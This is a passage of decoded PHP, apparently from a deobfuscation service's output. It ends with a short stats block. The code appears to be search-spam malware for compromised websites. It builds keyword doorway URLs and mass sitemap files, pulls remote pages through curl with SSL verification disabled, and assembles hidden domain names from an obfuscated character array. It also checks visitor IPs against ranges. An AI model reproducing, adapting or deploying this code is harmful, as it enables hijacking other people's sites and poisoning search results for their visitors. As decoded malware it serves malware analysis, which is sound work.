	$star = 0;	$priority = 0.1;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
	$str = "";						
	$tempArr1 = $filenames;
	
	foreach($tempArr1 as $value2){
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");		
			$tempPid = $value;
				$url = getalink($tempPid);
		
		
		
		if($first===false && $last===false && $checkTxt===false)
		{
			$date = date("Y-m-d");			$time = date("H:i:s");				
		
			if($star % 12000==11999){
				$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
				$str = '';				$gnumber++;				return;			}
			
		
			
	
			$str .= "   <url>
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url>
		";	
			
			
			$star++;			$starPri++;		}
	}
	
	{
		$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';		$gnumber++;		echo '<br/>'.$gFile.'<br/>';
		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
	}
	
	unset($tempArr1);	unset($filenames);	
	echo "sitemap";	
}
function gsitemap($filenames,$c=1,$jdt=1){
	global $gnumber,$arrArrr;	
	$filePres = '';	$fileEnds = '';	
	
	$fpath='http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];	$serpath=substr($fpath,0,strrpos($fpath,'/'));
	$siteLink='http://'.$_SERVER['HTTP_HOST'];		
	$mapPre = '<'.'?xml version="1.0" encoding="UTF-8" ?'.'>'. PHP_EOL.'<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . PHP_EOL;	$mapEnd = PHP_EOL . '</urlset>';
	// $urlsArray = $filenames;
	// $numLinks = count($urlsArray);
	
	$star = 0;	$priority = 0.9;	$starPri = 0;	$gFile ="";	$date = date("Y-m-d");	$time = date("H:i:s");
	$str = "   <url>
			 <loc>" . $siteLink . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod> 
			 <changefreq>always</changefreq> 
			 <priority>1.0</priority> 
			 </url>
		";						
	$tempArr1 = $filenames;
	
	foreach($tempArr1 as $value2){
		$curphp=basename(__FILE__); 
		$value = $value2;		$first=stristr($value,".php");		$last=stristr($value,".xml");		$checkTxt =stristr($value,".txt");	
		
			$tempPid = $value;
				$url = getalink($tempPid);
		
		if($first===false && $last===false && $checkTxt===false)
		{
			$date = date("Y-m-d");			$time = date("H:i:s");			
	
			if($star % 12000==11999){
				$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';				echo '<br/>'.$gFile.'<br/>';				
				$put_str = $mapPre . $str . $mapEnd;				@unlink($gFile);				file_put_contents($gFile,$put_str);
				$str = '';				$gnumber++;				return;				
			}
			
			if($starPri >= 400 && $priority != 0.1){
				$starPri = 0;				$priority = $priority - 0.1;			}
			
			if($priority > 0.1){
				
				$str .= "   <url>
					 <loc>" . $url . "</loc> 
					 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
					 <changefreq>daily</changefreq> 
					 <priority>". $priority . "</priority> 
					 </url>
				";	
			}else{
										$str .= "   <url>
			 <loc>" . $url . "</loc> 
			 <lastmod>". $date . "T" . $time ."-05:00</lastmod>  
			 <changefreq>daily</changefreq> 
			 <priority>0.1</priority> 
			 </url>
		";	
			}
			
			$star++;			$starPri++;		}
	}
	
	{
		$gFile = '../sitemaps/sitemap' . $gnumber .'.xml';		echo '<br/>'.$gFile.'<br/>';		
		$gnumber++;
		$put_str = $mapPre . $str . $mapEnd;		@unlink($gFile);		file_put_contents($gFile,$put_str);	
	}
	
	unset($tempArr1);	unset($filenames);	echo "sitemap";	
}


 
function fillUrl($str = '', $url){
	$relur = '#(?:href|src) ?= ?"([^"]+)"#s';	
	$urlInfo = parse_url($url);	
	
	preg_match_all($relur, $str, $matches);
	if(count($matches[1])){
		foreach($matches[1] as $values){
			if(!strstr($values, "//") && !strstr($values, "..")){
				$rStr = $urlInfo['host']."/".$values;				$rStr = 'http://' . str_replace('//','/',$rStr);				
				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}elseif(strstr($values, "..")){
				
				// echo $urlInfo['host'];				// echo str_replace(basename($url),"",$url);				// die();				
				$rStr = str_replace(basename($url),"",$url)."/".$values;				
				
				$rStr = str_replace("http://","<llqhttp>",$rStr);				
				$rStr = str_replace("https://","<llqhttps>",$rStr);				
				$rStr = str_replace("//","/",$rStr);				
				$rStr = str_replace("<llqhttps>","https://",$rStr);				
				$rStr = str_replace("<llqhttp>","http://",$rStr);				
				$str = str_replace('"'.$values.'"', '"'.$rStr.'"' , $str) ;			}
		}
	}	
	
	
	$relur = '#(?:href|src) ?= ?\'([^\']+)\'#s';	
	$urlInfo = parse_url($url);	
	
	preg_match_all($relur, $str, $matches);	
	// print_r($matches[1]);	
	if(count($matches[1])){
		foreach($matches[1] as $values){
			if(!strstr($values, "//") && !strstr($values, "..")){
					$rStr = $urlInfo['host']."/".$values;				$rStr = 'http://' . str_replace('//','/',$rStr);				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}elseif(strstr($values, "..")){
				
				$rStr = str_replace(basename($url),"",$url)."/".$values;				
				
				$rStr = str_replace("http://","<llqhttp>",$rStr);				
				$rStr = str_replace("https://","<llqhttps>",$rStr);				
				$rStr = str_replace("//","/",$rStr);				
				$rStr = str_replace("<llqhttps>","https://",$rStr);				
				$rStr = str_replace("<llqhttp>","http://",$rStr);				
				$str = str_replace("'".$values."'", "'".$rStr."'" , $str) ;			}
		}
	}
	return $str;}
function auto_read($str, $charset='UTF-8') {
	$list = array('EUC-JP', 'Shift_JIS', 'UTF-8', 'iso-2022-jp');
	$encode = mb_detect_encoding($str, $list);	// echo $encode;die();	
	if($encode == 'UTF-8'){
		return $str;	}else{
		return mb_convert_encoding($str, $charset, $encode);	}
	 
}
function detect_encoding($file){
	$list = array('GBK', 'UTF-8', 'UTF-16LE', 'UTF-16BE', 'ISO-8859-1');	$str = file_get_contents($file);	foreach ($list as $item) {
		$tmp = mb_convert_encoding($str, $item, $item);		if (md5($tmp) == md5($str)) {
		
			return $item;		}
	}
	return null;}
function curl_get_from_webpage($url,$proxy='',$loop=10){
	$data = false;    $i = 0;    while(!$data) {
       $data = curl_get_from_webpage_one_time($url,$proxy);       if($i++ >= $loop) break;    }
	return $data;}
 

function curl_getjs_from_webpage($url,$time){
if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){
 
  $curl = curl_init();	//,.
	$user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100";			
	// $urlReferer = "http://www.google.com";
	curl_setopt($curl, CURLOPT_URL, $url);	
		if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0,	CURLOPT_POSTFIELDS => '',			CURLOPT_RETURNTRANSFER => 1,CURLOPT_TIMEOUT => $time,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1,			CURLOPT_VERBOSE => 0
			));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_TIMEOUT, $time);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
	}$data=curl_exec($curl);curl_close($curl); 
 }else{
 
  $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; 
  if($is_auf){
		$data = file_get_contents($url); 
  }
 
 }
	if(!$data) return false;
	return $data;	
	
}

function curl_get_from_webpage_one_time($url,$proxy=''){
if(function_exists("curl_init") && function_exists("curl_setopt") && function_exists("curl_exec") && function_exists("curl_close")){
 
  $curl = curl_init();	//,.
	$user_agent = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; chromeframe/12.0.742.100";			
	// $urlReferer = "http://www.google.com";
	if(strlen($proxy) > 8) curl_setopt($curl, CURLOPT_PROXY, $proxy);
curl_setopt($curl, CURLOPT_URL, $url);	
		if(stristr($url,"https:")){ curl_setopt_array($curl, array(CURLOPT_SSL_VERIFYHOST => 2,CURLOPT_SSL_VERIFYPEER => 0,	CURLOPT_POSTFIELDS => '',			CURLOPT_RETURNTRANSFER => 1,CURLOPT_USERAGENT => $user_agent,CURLOPT_HEADER => 1,			CURLOPT_VERBOSE => 0
			));}else{curl_setopt($curl, CURLOPT_URL, $url);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_HEADER, false);curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);curl_setopt($curl, CURLOPT_USERAGENT, $user_agent);
	}$data=curl_exec($curl);curl_close($curl); 
 }else{
 
  $is_auf=ini_get('allow_url_fopen') && function_exists("file_get_contents")?true:false; 
  if($is_auf){
		$data = file_get_contents($url); 
  }
 
 }
	if(!$data) return false;
	return $data;	
	
}	
//function my_mkdir($dir){
		global $fitime;
		if(!is_dir($dir)){
			mkdir($dir);
			@touch($dir, $fitime, $fitime);  
		} 
	}
	

	
	function generate_dir_file($gDir=''){
		
		global $hostDir;
		$gDir = str_replace('/',DIRECTORY_SEPARATOR,$gDir);
		$gDir = str_replace('\\',DIRECTORY_SEPARATOR,$gDir);
		$arr = explode(DIRECTORY_SEPARATOR,$gDir);
		
		if(count($arr) <= 0) return;
		
		if(!strstr($gDir,$hostDir))
			$dir = $hostDir;
		else
			$dir = '';


		for($i = 0 ; $i < count($arr)-1 ; $i++){
			$dir .= DIRECTORY_SEPARATOR . $arr[$i];
			my_mkdir($dir);
		}
		
		return $dir;
	}
		
	
	function getalink($pid){
		
		global $arrnametime,$arrKeywz,$arr_word,$strRand;		
	
		$filePres = '';		$fileEnds = '';		$siteLink='http://'.$_SERVER['HTTP_HOST'];
		$dirNames = dirname(__FILE__);		$httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));		
		if(JDT == 2){
			$filePres = $siteLink ."/". $httcReplace . "/" . basename(__FILE__) . "/";		}elseif(JDT == 1){
			$filePres = $siteLink ."/". $httcReplace . "/";		}elseif(JDT == 3){
			$filePres = $siteLink ."/". $httcReplace . "/" .basename(__FILE__) . "?keyword=";		}else{
			$filePres = $siteLink."/";		}
		
		$ms = $arrnametime[$pid % count($arrnametime)];		
		
		$keyNum = $arrKeywz[$pid % count($arrKeywz)];		
		$keyWordKey = $pid % 10;		$keyStrKey = $pid % strlen("icedrkswzjhpnxoyvumfatblgq");		$keyArr = array();		$flag = 0;		
		if($ms == 2 or $ms ==4){
			if($keyNum >= 9){
				$fg = 4;			}elseif($keyNum >= 7){
				 $fg = 3;			}else{
				 $fg = 2;			}
		}
		
		for($i=0;$i<$keyNum;$i++){
			$tempNum = $arr_word[$i][$keyWordKey];			$tempstr = '';			for($j=0;$j<$tempNum;$j++)
				$tempstr .= $strRand[$flag++]{$keyStrKey};			
			$keyArr[$i] = $tempstr;		}
		
		$PidWz = $pid % $keyNum;		$linkCenter = '';
		
		if(JDT == 3){
			for($i=0;$i<$keyNum;$i++){
				if($PidWz == $i && $i != 0)
					$linkCenter .= '-'. BZPRO . $pid .'-';	
				elseif($PidWz == $i)
				  $linkCenter .= BZPRO . $pid .'-';
				
				$linkCenter .= $keyArr[$i] .'';			
			}
			$linkCenter = $linkCenter . "#llq";		
			$linkCenter = str_replace('-#llq','',$linkCenter);	
			$linkCenter = str_replace('#llq','',$linkCenter);
			$linkCenter = str_replace('--','-',$linkCenter);	
			$linkCenter = str_replace('/-','/',$linkCenter);				
			$rtStr = $filePres.$linkCenter;
			$rtStr = str_replace($filePres.'-',$filePres,$rtStr);
		
			return $rtStr;
			
			}
		
		
		
		
		if($ms == 1){
			for($i=0;$i<$keyNum;$i++){
				if($PidWz == $i && $i != 0)
					$linkCenter .= '-'. BZPRO . $pid .'-';	
				elseif($PidWz == $i)
				  $linkCenter .= BZPRO . $pid .'-';
				
				$linkCenter .= $keyArr[$i] .'';	
			}
			
			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
		}elseif($ms == 2){
			for($i=0;$i<$keyNum;$i++){
				if($PidWz == $i && $i != 0)
					$linkCenter .= '-'. BZPRO . $pid .'-';	
				elseif($PidWz == $i)
				  $linkCenter .= BZPRO . $pid .'-';
				
				$linkCenter .= $keyArr[$i] .'';	
				

				if($i == $fg-1){
					// $linkCenter .= '/';				
					$linkCenter .= '-';				
				}
			}
			
			$linkCenter .= "/";			$linkCenter = str_replace("-/","/",$linkCenter);			
		}elseif($ms == 3){
			for($i=0;$i<$keyNum;$i++){
				if($PidWz == $i && $i != 0)
					$linkCenter .= '-'. BZPRO . $pid .'-';	
				elseif($PidWz == $i)
				  $linkCenter .= BZPRO . $pid .'-';
				
				$linkCenter .= $keyArr[$i] .'';	
			}
			
			$linkCenter .= JTHZ;			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);			
			
		}elseif($ms == 4){
				for($i=0;$i<$keyNum;$i++){
				if($PidWz == $i && $i != 0)
					$linkCenter .= '-'. BZPRO . $pid .'-';	
				elseif($PidWz == $i)
				  $linkCenter .= BZPRO . $pid .'-';
				
				$linkCenter .= $keyArr[$i] .'';	

				if($i == $fg-1){
				// $linkCenter .= '/';				
					$linkCenter .= '-';			
					}
			}
			
			$linkCenter .= JTHZ;			$linkCenter = str_replace("-/","/",$linkCenter);			$linkCenter = str_replace("-".JTHZ,JTHZ,$linkCenter);		}
		
			$linkCenter = str_replace('--','-',$linkCenter);	
			$linkCenter = str_replace('/-','/',$linkCenter);	
			
		$rtStr = $filePres.$linkCenter;
		$rtStr = str_replace($filePres.'-',$filePres,$rtStr);
		
		return $rtStr;
	}
	
	
	function rmhtmltag($tagname='',$str=''){
		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#s';
		$str = preg_replace($rulers,'',$str);
		$rulers = '#<'.$tagname.'[^>]*>.*?</'.$tagname.'>#i';
		$str = preg_replace($rulers,'',$str);
		return $str;
	
	}
 
 
 function rmhtmltag2($tagname='',$str=''){
		$rulers = '#<'.$tagname.'[^>]*>#s';
		$str = preg_replace($rulers,'',$str);
		$rulers = '#</'.$tagname.'>#s';
		$str = preg_replace($rulers,'',$str);
	
	$rulers = '#<'.$tagname.'[^>]*>#i';
	$str = preg_replace($rulers,'',$str);
	$rulers = '#</'.$tagname.'>#i';
	$str = preg_replace($rulers,'',$str);
	return $str;
	
	}
	
	
	
// 

	
	
function is_ip($localIp,$ipRanges)
{  
	$localIp = ip2long($localIp); 
	foreach($ipRanges as $val)
	{ 
		$ipmin=sprintf("%u",ip2long($val[0]));		$ipmax=sprintf("%u",ip2long($val[1]));
		if($localIp >= $ipmin && $localIp <= $ipmax)
		{  
			return true; 
		} 
	}  
	return false;}
 
function RandAbcs($length = ""){
  $str = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_./:-";
  return ($str);
} 


 
function getarr(){
		global $O00O0O;
		$arr[0]=$O00O0O{6}.$O00O0O{8}.$O00O0O{13}.$O00O0O{6}.$O00O0O{11}.$O00O0O{4}.$O00O0O{3}.$O00O0O{0}.$O00O0O{19}.$O00O0O{0}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[1]=$O00O0O{12}.$O00O0O{8}.$O00O0O{11}.$O00O0O{21}.$O00O0O{0}.$O00O0O{8}.$O00O0O{2}.$O00O0O{4}.$O00O0O{13}.$O00O0O{19}.$O00O0O{4}.$O00O0O{17}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[2]=$O00O0O{13}.$O00O0O{14}.$O00O0O{21}.$O00O0O{4}.$O00O0O{23}.$O00O0O{14}.$O00O0O{18}.$O00O0O{14}.$O00O0O{20}.$O00O0O{17}.$O00O0O{4}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[3]=$O00O0O{19}.$O00O0O{20}.$O00O0O{18}.$O00O0O{8}.$O00O0O{12}.$O00O0O{4}.$O00O0O{3}.$O00O0O{8}.$O00O0O{6}.$O00O0O{8}.$O00O0O{19}.$O00O0O{0}.$O00O0O{11}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};$arr[4]=$O00O0O{17}.$O00O0O{14}.$O00O0O{2}.$O00O0O{0}.$O00O0O{13}.$O00O0O{0}.$O00O0O{19}.$O00O0O{17}.$O00O0O{0}.$O00O0O{13}.$O00O0O{18}.$O00O0O{63}.$O00O0O{23}.$O00O0O{24}.$O00O0O{25};
	return $arr;
}
	
function getthisdom(){
	$myArrs = getarr();
  return 'http://www.'.$myArrs[CENTERKEY].MYDIR;
} 
 
 
 
function get_real_ip(){
	
	$ip=false;	if(!empty($_SERVER["HTTP_CLIENT_IP"])){
		$ip = $_SERVER["HTTP_CLIENT_IP"];	}
	
	if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
		$ips = explode (", ", $_SERVER['HTTP_X_FORWARDED_FOR']);		if ($ip) { array_unshift($ips, $ip); $ip = FALSE; }
		
		for ($i = 0; $i < count($ips); $i++) {
			if (!eregi ("^(10|172\.16|192\.168)\.", $ips[$i])) {
				$ip = $ips[$i];				break;			}
		}
	}
	
	return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);}
 
//file end

Function Calls

define 1
ini_set 2
set_time_limit 1

Variables

None

Stats

MD5 b8433e9436fd6169cb36499f36193a85
Eval Count 0
Decode Time 254 ms